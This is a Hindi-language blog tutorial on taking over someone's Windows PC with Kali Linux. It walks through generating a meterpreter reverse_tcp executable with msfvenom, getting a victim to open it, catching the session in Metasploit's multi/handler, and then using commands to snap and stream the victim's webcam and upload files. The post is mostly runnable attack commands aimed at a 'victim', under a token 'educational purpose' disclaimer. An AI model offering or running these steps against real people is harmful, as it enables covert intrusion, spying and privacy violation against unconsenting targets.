Kali Linux Se Computer Hack Kaise Kare?

18

How to hack computer (Windows PC) with kali linux in hindi? किसी का भी कंप्यूटर हैक कैसे करें? उसके बारे में मैंने आपको पिछले पोस्ट में बताया था, और आज इस पोस्ट में हम जानिंगे की Kali Linux Se Computer Hack Kaise Kare?

Kali Linux Se Computer Hack Kaise Kare?

अगर आपको नहीं पता की Kali Linux क्या होता है? तो लिनक्स क्या है? और कंप्यूटर में Kali Linux Install कैसे करें? इसके बारे में मैंने पहले से ही बताया हुआ है. आप चाहो तो पहले उस पोस्ट को पढ़ सकते हो. और आज इस पोस्ट में हम जानिंगे की Kali Linux Se Computer Hack Kaise Kare?


Kali Linux से WiFi का पासवर्ड हैक कैसे करें? इनसब के बारे में मैंने पहले से ही डिटेल से बताया हुआ है. अगर आप चाहो तो पहले उन पोस्ट को पढ़ सकते हो. और आज इस पोस्ट में हम जानिंगे की Kali Linux से किसी के भी कंप्यूटर को हैक कैसे करें?

Kali Linux Se Computer Hack Kaise Kare?

Kali Linux से किसी के भी Windows PC को हैक करने के लिए सबसे पहले आपको एक payload create करना होगा, नीचे बताये गए steps को carefully follow करें।


Alert: यह पोस्ट  सिर्फ  Educational Purpose के लिए है , इसका  कोई भी गलत उपयोग न करे. 😉 

Step1: सबसे पहले आपको अपने Kali Linux OS में terminal को open करना है, और नीचे दिए गए command को type करना है.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.111 lport=4444 -f exe -a x86 > Kali.exe


msfvenom: यह एक kali linux का tool है, जिसको ज्यादातर reverse engineering में use किया जाता है.

-p windows/meterpreter/reverse_tcp: p for payload or यहां पर आप windows के लिए एक payload create कर रहे है, इसलिए यहां windows लिखिंगे।

lhost: यहां पर आपको अपना local ip address डालना है.

*अपना ip address check करने के लिए kali linux में एक new terminal open करे और ifconfig type करे.

lport: यहां पर आपको local port set करना है, आप 4444 की जगह कुछ भी सेट कर सकते हो.


-f exe: f for format, यहां पर आपको अपने payload का format set करना है, आप windows के लिए create कर रहे है, इसलिए exe type करें।

-a x86: a for architecture, यहां पर आपको अपने payload का architecture choose करना है, अगर आप 32 bit का payload create करना चाहते हो तो x86 type करे.

kali.exe: यह आपके payload का नाम है, इसकी जगह आप कुछ भी लिख सकते हो. ex: futuretricks.exe


यह भी पढ़े: एंड्राइड मोबाइल हैक (Android Mobile Hack) कैसे करें?

ऊपर बताये गए cmd को type करने के बाद enter press करे, अब आपके सामने कुछ इस type का window show होगा।

Step2: अब आपका Payload create हो चूका है, root folder में आपको आपका payload मिल जायेगा।

Step3: अब आपको इस payload (kali.exe) को victim को send करना है. और बस किसी भी तरह से एक बार बस इसको victim के कंप्यूटर में ओपन कर देना है.

Victim के Computer में payload के open होने के बाद आपको अपने Kali Linux PC में नीचे बताये cmd को एक एक type करना है.

Step4: अब आपको अपने kali linux terminal में सबसे पहले msfconsole type करना है.

Step5: अब आपके pc में metasploit framework console start हो जायेगा। इसमें थोड़ा time लग सकता है तो have patience  😉

Step6: metasploit framework console open होने के बाद नीचे दी गयी commands को एक एक करके टाइप करे.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.111 (yha par aapko apna local ip daalna hai)
set lport 4444
exploit

जैसे ही आप यह सब cmd एक एक करके type करोगे, आप victim के computer से connect हो जयिंगे। (अगर victim ने आपके payload को open किया होगा तो)

Step7: अब अगर आप Victim के computer की basic info check करना चाहते हो तो, sysinfo type करें।

Step8: अब आप victim के computer से connect हो चुके है. अब आप उसके computer के साथ बहुत कुछ कर सकते हो. बस आपको नीचे दिए गए cmd को type करना है.

यह भी पढ़े: Facebook Account कैसे हैक करें – ID हैक करने के 5 तरीके

webcam_snap: आप victim के computer से screenshot ले सकते हो.
webcam_chat: आप victim के साथ live video chat कर सकते हो.
webcam_stream: आप victim के कंप्यूटर के webcam की video recording कर सकते हो.
cd: directories change कर सकते हो.
upload: victim में कंप्यूटर में files or directories upload कर सकते हो.

इसके इलावा और भी बहुत कुछ आप अपने victim के कंप्यूटर के साथ कर सकते हो. आप victim के pc के साथ क्या क्या कर सकते हो यह सब जानने के लिए terminal में help type करें।

तो दोस्तों इस तरह आप एक meterpreter payload बनाकर किसी के भी windows pc को हैक कर सकते हो. उम्मीद है आपको यह पोस्ट helpful लगा हो.

आप आप जान ही चुके होंगे की Kali Linux Se Computer Hack Kaise Kare? अगर आपको लगता है की किसी ने आपके कंप्यूटर को हैक कर लिया है, या फिर कोई आपके कंप्यूटर को Monitor और SPY कर रहा है. कंप्यूटर हैक है कैसे पता करे – हैक हो जाये तो क्या करे? इसके बारे में मैंने पहले से ही Detail से बताया हुआ है. आप उन पोस्ट को पढ़ सकते हो.

यह भी पढ़े: 

अगर आपके पास इस पोस्ट से रिलेटेड कोई सवाल है तो नीचे कमेंट करे. और अगर पोस्ट पसंद आया हो तो सोशल मीडिया पर शेयर भी कर दे.

18 COMMENTS

  1. Sir help wale option se me hm or kya kya kr sakte h victim ke phone pr or kya sir hm kali linux me data ko upload ya download kr sakte h ….

LEAVE A REPLY

Please enter your comment!
Please enter your name here